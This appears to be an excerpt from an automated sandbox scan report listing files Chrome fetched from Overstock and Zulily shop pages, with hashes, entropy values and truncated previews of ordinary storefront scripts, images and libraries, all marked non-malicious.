                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-ShopPayWrapper.mG72mrD0.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","context.C2MjukUF.js","usePreselectSpi.Dc56ArDd.js","useIsOriginatedFromShop.7toB9y1y.js","Section.Dvvun2gq.js","assets/Section.sQehCocD.css","publishMessage.CX0yXme-.js","ShopPayLoginLoader.DsmWyqS8.js","assets/ShopPayLoginLoader.CjGSo8kt.css","PayButtonSection.DAi6V-5g.js","Rollup.B0QeYKuB.js","assets/Rollup.o9Mx-fKL.css","useShowShopPayOptin.cjqea2Mu.js","RageClickCapture.BAiET0lR.js","MarketsProDisclaimer.D4Dihv-c.js","assets/RageClickCapture.DnkQ4tsk.css","assets/PayButtonSection.DF7trkKf.css","DeliveryMethodSelectorSection.HuQ_vE9w.js","useUnauthenticatedErrorModal.AwvSMfsF.js","LegacyVaultedShippingMethods.CLlWtWZU.js","SubscriptionPriceBreakdown.CxrCP-xw.js","assets/SubscriptionPriceBreakdown.Bqs0s4oM.css","ShopPayLogo.MmDQrsit.js","assets/ShopPayLogo.D_HPU8Dh.css","index.2zVq00Bx.js","PickupPointCarrierLogo.Dit2gzD9.js","assets/PickupPoint
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):15852
                                                                                                                                                                                    Entropy (8bit):7.950603377805367
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:KnTqhWlIoaWp3pkDZbT9i1/+PVlR4coTWhS5S:KOg/pZMZbT9i1/+dlRYTWhR
                                                                                                                                                                                    MD5:43701A6E7556B1A10128583F1E3DB5D2
                                                                                                                                                                                    SHA1:2E9A2083DE3B3C9D701C2DE7DA4006544881A524
                                                                                                                                                                                    SHA-256:008B1B63F6FF7452E20FE4D2D8C645ACC72DF2E33AAEDFB945F775E34B22F61E
                                                                                                                                                                                    SHA-512:03557492B11E14A36FACA91AC13FAD8E02F94CDF56F0C5EE645D009CB5F7B531767765A90084A6A694FBB6F1CBD285FAB92C3E7965AA6C9DE27E7927BBB9BF33
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/collections/Acroma-20-light-Modern-Farmhouse-40In-Round-Wagon-Wheel-Chandelier.jpg?v=1710950168&width=320
                                                                                                                                                                                    Preview:RIFF.=..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 T;......*@.@.>9..D"!...0 .....*5...jo..#..^..;..w.........?...>....7y..L.Y.......)_X........{.. ...]...C..g.O..k.P...c.7............g..i...;..?y.=.....w.....|7..._...?.~c~g...?....W.....?....................&.....B./.......?..&.^.K......._....P.....I.{........~V}..8.......o.....a...%.s...'........>.n.E.......e......ow.=5..;3..u......(..R{.....v.O..|.......PC........ut.9.m..L.K.1n.........g....Fz...<.&6.._.``..X.."F..lV..\..._.=..Jb...((..w4..(+.^.........N.k......T.p..[+\1..?b.E..1..'/y.....F...vs.".
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (8253)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):8352
                                                                                                                                                                                    Entropy (8bit):5.030342335645065
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:Rx1ixNaLJ7FuZgs9fqOUXcCX0YbYZYxxYwYwFY8VuWxddfAX3mZQb8F2L:Rx1ixELfRICX0YbYZYxxYwYwKCdoHmEL
                                                                                                                                                                                    MD5:52DB3EA5677943064FB20324A04DC772
                                                                                                                                                                                    SHA1:479BA4C0BFD3AC9A8A11DFC52A5F619168C76960
                                                                                                                                                                                    SHA-256:E88DBA4058FA38A58B8BFDA0281E7BFB1FFE9FF2F8858A1F329239D33C5715D8
                                                                                                                                                                                    SHA-512:5D7DED91E4A13B1AA5B8BDE90B02616209886E21CF59EBF28FFD0BC602D93F170632403367DAE5FB084A085A9A3A2B2FE74E48E69CD53990F69BC30777494E70
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/variant-picker.js?v=75103039447232228181730157903
                                                                                                                                                                                    Preview:if(!customElements.get("variant-picker")){class VariantPicker extends HTMLElement{constructor(){super(),this.section=this.closest(".js-product"),this.productForm=this.section.querySelector(".js-product-form-main"),this.optionSelectors=this.querySelectorAll(".option-selector"),this.data=this.getProductData(),this.variant=this.getSelectedVariant(),this.updateAvailability(),this.updateAddToCartButton(),this.addEventListener("change",this.handleVariantChange.bind(this))}handleVariantChange(evt){this.variant=null,this.variant=this.getSelectedVariant(),this.variant&&(this.updateMedia(),this.updateUrl(evt),this.updateVariantInput()),this.updateAddToCartButton(),this.updateAvailability(),this.updatePrice(),this.updateWeight(),this.updateBarcode(),this.updateBackorderText(),this.updatePickupAvailability(),this.updateSku(),VariantPicker.updateLabelText(evt),this.dispatchEvent(new CustomEvent("on:variant:change",{bubbles:!0,detail:{form:this.productForm,variant:this.variant,product:this.data.prod
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):21140
                                                                                                                                                                                    Entropy (8bit):7.937814177406653
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:Nmf9KAeAJXdJBeFNt/FgfiaLekqkh22rLLgwoOEP/8oPh0gYqdJy+lZLuz:OYaT/8NAfiaLMkh22XMFBcG0gYqdk5z
                                                                                                                                                                                    MD5:40067220C5EA4DC23D374CAEFDC86F0F
                                                                                                                                                                                    SHA1:46EF18095E1EE0566B20794091991D8F91695657
                                                                                                                                                                                    SHA-256:F7DCA96ADD54AFD118E2153EA7B5F6B3DD1FFFA4AA4CC134CC322021BF517638
                                                                                                                                                                                    SHA-512:7D623318F7C874AB19EC5CB24F8822554CEDED24FDC3B30B4F44EBEB0F84327A6DB5996DEAA5AF64636A33DA017D270A152FDA6ACA50CB11749E01EC9F24025A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................t...'A.D..B.MI.aP.t!.........!:.N....H.!.B(.\.rT .B..!.B.....].(d!..!..!.D..H...6.B..!.".. .h.4Bt..:...*. .4j|.gg...BJ....B........PB
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2521)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2622
                                                                                                                                                                                    Entropy (8bit):4.9555163144525824
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:RDNpJHSLA1X23pb7g5S9y8r1bKj1bKoCs3rSLb/xNI:RFzKbJt8XCDRq
                                                                                                                                                                                    MD5:3664E9F7501BC326A468CBF2239755BC
                                                                                                                                                                                    SHA1:E68A1FE039150E0D261A8CBDA85E39AA608D1B8D
                                                                                                                                                                                    SHA-256:E9D057D4A383917D1B4E0EA60D18945BCC7DBD94B395BA33359CEEE4328070D0
                                                                                                                                                                                    SHA-512:16975459FD9AECAFBF5B05091017D3EF66546BF3D2E4F5CF4AF70EC3E6BABB29AC28F0DD56B7E0E95715FFD839C3672A83CD434A05B9848C84BF940BEDE37D55
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:if(!customElements.get("product-message")){class ProductMessage extends HTMLElement{constructor(){super(),this.closeButton=this.querySelector(".js-close-message"),this.openInEditor=!1,this.init(),this.bindEvents()}disconnectedCallback(){this.blockSelectHandler&&document.removeEventListener("shopify:block:select",this.blockSelectHandler),this.blockDeselectHandler&&document.removeEventListener("shopify:block:deselect",this.blockDeselectHandler)}init(){let preventShow=!1;if(this.dataset.persistentClose&&!Shopify.designMode){const closedMessages=theme.storageUtil.get("closed-messages",!0)||[];closedMessages&&closedMessages.includes(this.dataset.blockId)&&(preventShow=!0,this.remove())}this.classList.contains("product-message--out")&&(!preventShow||Shopify.designMode)&&(this.show(!this.dataset.transient),this.dataset.transient&&setTimeout(()=>{this.openInEditor||this.hide(!1)},this.dataset.transient*1e3))}bindEvents(){this.closeButton&&this.closeButton.addEventListener("click",this.handleCl
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (4654)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4655
                                                                                                                                                                                    Entropy (8bit):4.171152801080154
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:/bpk/CAB3iFxSFBECchpIAuBsTtkAcaeptaj/n:/1k//RSxSFBECczc4n
                                                                                                                                                                                    MD5:6A27F9079A7030A9A40A07D115AF2835
                                                                                                                                                                                    SHA1:24D7B656E5D6E52CBC252EDED42F2949D19F4BB2
                                                                                                                                                                                    SHA-256:720F20C3F7E9EE0A9A936B2EC287C4C4FC2B558954C0E2D02EB51B2E09695069
                                                                                                                                                                                    SHA-512:C231238C60BC293387E910D32C39F026C171F5B81CFDF5D9592C5841A3333AC108ADB4EDBFE2E402A967A55327FE8DF2FB90509E366F0BE794819B7F16CB9708
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shopifycloud/portable-wallets/latest/shop-pay-logo-CYhOC7ye.js
                                                                                                                                                                                    Preview:const C='<svg role="img" aria-labelledby="shop-pay-logo" viewBox="0 -2 341 81" xmlns="http://www.w3.org/2000/svg" height="20px" width="85px">\n <title id="shop-pay-logo">Shop Pay</title>\n <path fill-rule="evenodd" clip-rule="evenodd" d="M227.297 0C220.448 0 214.896 5.47237 214.896 12.2229V67.8125C214.896 74.563 220.448 80.0354 227.297 80.0354H328.357C335.206 80.0354 340.758 74.563 340.758 67.8125V12.2229C340.758 5.47237 335.206 0 328.357 0H227.297ZM244.999 55.8917V41.8012H253.993C262.21 41.8012 266.579 37.2604 266.579 30.379C266.579 23.4976 262.21 19.3782 253.993 19.3782H239.205V55.8917H244.999ZM244.999 24.8084H252.663C257.982 24.8084 260.595 26.9617 260.595 30.5663C260.595 34.1708 258.077 36.3242 252.9 36.3242H244.999V24.8084ZM276.795 56.6407C281.212 56.6407 284.109 54.7214 285.439 51.4445C285.819 55.0959 288.052 56.9684 292.896 55.7044L292.944 51.819C290.996 52.0063 290.616 51.3041 290.616 49.2912V39.7415C290.616 34.124 286.864 30.8003 279.93 30.8003C273.09 30.8003 269.148 34.1708
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2297
                                                                                                                                                                                    Entropy (8bit):6.9817100003777
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVx8UAewaI6jHnd57jGVk4jCQ4qeIcN+:NBIl/Xrx8UlyiHXf4Tb
                                                                                                                                                                                    MD5:EDB082AE71BF5D4BDE4CF4995333091E
                                                                                                                                                                                    SHA1:1AFDA7EDF1326122E81BE7C85B11484B87813347
                                                                                                                                                                                    SHA-256:BE5288EE93B500A50FDACF4C30FBA5CDAF3EBF815D37CBE9387AB5E3D65A2513
                                                                                                                                                                                    SHA-512:69D938E22F81F75A26E34DA59CA45A750FDA101310B5F6847BB96FED35A47D25E2449D0DF6434279129E5A47AC4C04AF53812763F97AB8EE68B5DF7CDC5076A6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.................................................................................r...L-~.].M .....'..F..uS ..%\W.*q.b......(....a..h.......6`.a.....!<...o{".@..(!.:n......,N..[.....2...f.....N..@....D.M.d......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 320 x 320, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):55253
                                                                                                                                                                                    Entropy (8bit):7.984378772044162
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:mMZljxx1BseovQ2X3IFLxVDLPAlcfBqglT0vz6:mS171W1vQ9L3DLI5gNcG
                                                                                                                                                                                    MD5:3D97E1DAAC7A01C3964CE655C14D8334
                                                                                                                                                                                    SHA1:92785A67D37E0B4F192DB410912C5AF1217A4E66
                                                                                                                                                                                    SHA-256:A4003838399E192E518B57C5383CF5F6FBA5DD12FF41E7C77349E4DD5B104DB6
                                                                                                                                                                                    SHA-512:85C88C1153568BFB00615A2C896757703A87A0515C035619720B8B65B49A15B71E31821D6C82623EAEBABB11AD1F58BF3AFC15E5BF87727B9E44A451DCBCFF83
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.PNG........IHDR...@...@............iCCPicc....c``\...[.$....WR........~...A...A..21...1 ...'.v...D_....@..LI-Nf``......\PT...........```.)...b``....!...;...V..............NBbC....d..Ld.$...A.R.....O2'.N....&`/.(m..Qs....$7......U...g..._{..K...KR+J@.....@a..6...E..._...' .f20loe`....SY........<...M...Ft....eXIfII*...........................V...........^...(.......................i.......f.......x2......x2................0210....................0100....................@...........@.......n.1.....pHYs...%...%.IR$... .IDATx..w|......z/66..SCo....%..j.JB.n.+..c.+...5....N.zo...z7.X.K.3...xovgW+Yn.l..#.........s..D...:.W.!..|....w...@!P...T...r.......".u../..Z.b|_...../.!..}..m.~...(wpU..=...i.B4k.....@.Pk?..?h...!:..^.Y.2.V.a.........R. .vX...E.e.....c#`.0...../.P.~... @{?.....x.]Z....U..b..~,B.......$`g.........B.[.3.....Ak....9.."P..0.5-..eu.^.*................P...AF.:......@)....x.].n..:^.%...)5....M.l.+..&R...>...u.."|.R,.......>.Z.../...e&HK@h......(F...j.z
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12875), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):12875
                                                                                                                                                                                    Entropy (8bit):5.229604496973644
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:YNQ6j5r9VBR0fUjk9Y9jnGhNPlIU628IubH6DezHkeqr17ctOo4o+KQCYqKEI0SQ:MjzQnnerg0XJrq67AcYeXVivod
                                                                                                                                                                                    MD5:F34D38C90923A3CF0A95695C11A3169B
                                                                                                                                                                                    SHA1:EDCCC3165018181940C8F5C509B596AE1F5BC635
                                                                                                                                                                                    SHA-256:EFF2497F10D71BBCD02C4372EFD22F3C7D74ED699A57073CCF912BD23CECACF4
                                                                                                                                                                                    SHA-512:EDFC5F14B2E266904E17841ED0BAE77E693DFC9CBDB2678718EB9FB166D6D6B49AF30134B925D0050F770730A2925F7CBC14096BF5B4F40262B10B46FD235CC8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shopifycloud/shopify/assets/storefront/load_feature-eff2497f10d71bbcd02c4372efd22f3c7d74ed699a57073ccf912bd23cecacf4.js
                                                                                                                                                                                    Preview:!function(){var e=function(e){var t={exports:{}};return e.call(t.exports,t,t.exports),t.exports},t=function(){function e(e,t){var r=[],o=!0,a=!1,n=void 0;try{for(var i,s=e[Symbol.iterator]();!(o=(i=s.next()).done)&&(r.push(i.value),!t||r.length!==t);o=!0);}catch(e){a=!0,n=e}finally{try{!o&&s.return&&s.return()}finally{if(a)throw n}}return r}return function(t,r){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t))return e(t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),r=function(e){return e&&e.__esModule?e:{default:e}},o=function(e){if(Array.isArray(e)){for(var t=0,r=Array(e.length);t<e.length;t++)r[t]=e[t];return r}return Array.from(e)},a=e((function(e,t){"use strict";function r(e){"loading"!==document.readyState?e():document.addEventListener?document.addEventListener("DOMContentLoaded",e):document.attachEvent("onreadystatechange",(function(){"loading"!==document.readyState&&e()}))}Object.defineProperty(t,"__esModule",{value:!0}),t.default
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):48316
                                                                                                                                                                                    Entropy (8bit):5.6346993394709
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (4654)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4655
                                                                                                                                                                                    Entropy (8bit):4.171152801080154
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:/bpk/CAB3iFxSFBECchpIAuBsTtkAcaeptaj/n:/1k//RSxSFBECczc4n
                                                                                                                                                                                    MD5:6A27F9079A7030A9A40A07D115AF2835
                                                                                                                                                                                    SHA1:24D7B656E5D6E52CBC252EDED42F2949D19F4BB2
                                                                                                                                                                                    SHA-256:720F20C3F7E9EE0A9A936B2EC287C4C4FC2B558954C0E2D02EB51B2E09695069
                                                                                                                                                                                    SHA-512:C231238C60BC293387E910D32C39F026C171F5B81CFDF5D9592C5841A3333AC108ADB4EDBFE2E402A967A55327FE8DF2FB90509E366F0BE794819B7F16CB9708
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:const C='<svg role="img" aria-labelledby="shop-pay-logo" viewBox="0 -2 341 81" xmlns="http://www.w3.org/2000/svg" height="20px" width="85px">\n <title id="shop-pay-logo">Shop Pay</title>\n <path fill-rule="evenodd" clip-rule="evenodd" d="M227.297 0C220.448 0 214.896 5.47237 214.896 12.2229V67.8125C214.896 74.563 220.448 80.0354 227.297 80.0354H328.357C335.206 80.0354 340.758 74.563 340.758 67.8125V12.2229C340.758 5.47237 335.206 0 328.357 0H227.297ZM244.999 55.8917V41.8012H253.993C262.21 41.8012 266.579 37.2604 266.579 30.379C266.579 23.4976 262.21 19.3782 253.993 19.3782H239.205V55.8917H244.999ZM244.999 24.8084H252.663C257.982 24.8084 260.595 26.9617 260.595 30.5663C260.595 34.1708 258.077 36.3242 252.9 36.3242H244.999V24.8084ZM276.795 56.6407C281.212 56.6407 284.109 54.7214 285.439 51.4445C285.819 55.0959 288.052 56.9684 292.896 55.7044L292.944 51.819C290.996 52.0063 290.616 51.3041 290.616 49.2912V39.7415C290.616 34.124 286.864 30.8003 279.93 30.8003C273.09 30.8003 269.148 34.1708
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4779), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4779
                                                                                                                                                                                    Entropy (8bit):5.432966155708213
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:9WsFpRR6JYMuuwCp0yXALwpdh02MGkm8NhRe61pecbt:9+d2CpRpjfMiMRHwcbt
                                                                                                                                                                                    MD5:7487394C252ED25468A2037369D345E5
                                                                                                                                                                                    SHA1:77E52C98B573C8DAD4542BA35D98A213B004D8AD
                                                                                                                                                                                    SHA-256:919293E56B6A814A84A579B014F63A2423B0419C418494DA7BAA7C0C5893CDE1
                                                                                                                                                                                    SHA-512:D60AA3C9FB3E33573819398EF86C8813AABE2B2932C65637D9BBF53860B760EA917E2FDA41C1B2EEF0D89EB9AC4495FD76E521B4B472D6C126770EAFBAED1BAD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://s.pinimg.com/ct/core.js
                                                                                                                                                                                    Preview:!function(t){var i={};function r(n){var e;return(i[n]||(e=i[n]={i:n,l:!1,exports:{}},t[n].call(e.exports,e,e.exports,r),e.l=!0,e)).exports}r.m=t,r.c=i,r.d=function(n,e,t){r.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:t})},r.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"u",{value:!0})},r.t=function(e,n){if(1&n&&(e=r(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.u)return e;var t=Object.create(null);if(r.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var i in e)r.d(t,i,function(n){return e[n]}.bind(null,i));return t},r.n=function(n){var e=n&&n.u?function(){return n.default}:function(){return n};return r.d(e,"a",e),e},r.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},r.p="",r(r.s=2)}([function(n,e){function t(n,e){return function(n){if(Array.isArray(n))return n}(n)||function(n,e){var t=null==n?null:"undefined"!=typ
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5276)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):32253
                                                                                                                                                                                    Entropy (8bit):5.001362234997696
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:MiQyo/tdqZbm4IDX+MQtrmstM7x4m0dMTvmxMcmQQIpjt07VF7ziWP:M3ydiDX+MQtrmstM7ym0dMbmxMcmQQI4
                                                                                                                                                                                    MD5:1DFA49B30A2390C5611E0AE2FCC6643D
                                                                                                                                                                                    SHA1:2C51BB22C3F1540DCF954F7DC94C485A3E3538AB
                                                                                                                                                                                    SHA-256:B446CD010673031A7CACB2A370C15183A67F9B66419C0C6CDA5007E7026C65F2
                                                                                                                                                                                    SHA-512:EE75F29A6060FAFF6B19CFDC44605FD3CF1BF75F18104D552C7601DEB41EAB8376617EBE2C2CD2C2DF7ED92E99337273A7900CE87D23FCB3CB2B35F9AB70D71E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/featured-product-banner.js?v=42268995681535563661730157903
                                                                                                                                                                                    Preview:import{storeFrontRequest}from"./storefrontapi.js";import{handleize,formatMoney}from"./helpers.js";if(!customElements.get("featured-product-banner")){class CollectionFeaturedProduct extends HTMLElement{constructor(){super(),this.productId=this.getProductIdFromUrl(),this.variantId=this.getVariantIdFromUrl(),this.sectionId=this.dataset.sectionId,this.isDesktop=theme.mediaMatches.lg,this.heading=this.dataset.heading,this.subheading=this.dataset.subheading,this.recoTitle=this.dataset.recoTitle,this.recoLimit=this.dataset.recoLimit,this.shopPayMin=this.dataset.shopPayMin,this.shopPayMax=this.dataset.shopPayMax}async connectedCallback(){if(!this.productId){this.hideProductBanner(),console.warn("No featuredProduct found in query parameters");return}try{const product=await this.fetchProductById(this.productId);product?(this.renderProduct(product),this.renderRecommendations(product),this.resizeHandler=this.resizeHandler.bind(this,product),window.addEventListener("on:debounced-resize",this.resize
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1761
                                                                                                                                                                                    Entropy (8bit):6.493474832859116
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZYbp//dJ+xBJ3JgKZpjDOD5x7SBg1z4BBSTUgOSfYZ:NBIl/XflVxGp1gxBJJg6Bg94XYo/
                                                                                                                                                                                    MD5:679A5DE9CCE1104352E1C9FB8CD722B8
                                                                                                                                                                                    SHA1:50DD14906F05BE28AEB54F166F0C19F3484BE3CD
                                                                                                                                                                                    SHA-256:406AC34955D63C6D6042BAEFDB790D9FF82797E99FEF06ADBB1DBDB9B9E80F7B
                                                                                                                                                                                    SHA-512:841AF3629F763044831D3297CAF36059084A726613749B89EE1A86665D7B6919CE7A3250A7CEDF16E92F2DB4778087CC62F60B3332CB8743DC3BCA9ADE4BD0FF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P......................................................................................>A.=.......NS.P%..v."9.;........F]......T....o2l..y.jv..x...l&&m):.s6................;..........................!1.."A.2Qa..@BRq
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1522)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1523
                                                                                                                                                                                    Entropy (8bit):5.344008634188652
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:irjULQyolDRF9f34+dVuGGdt178co7pJNoOYS7VduiqNanUenfe:is87Fo+dV+7VCpJ6q+/aZnfe
                                                                                                                                                                                    MD5:DD0B8E0B63C262D76924B97815F4AB51
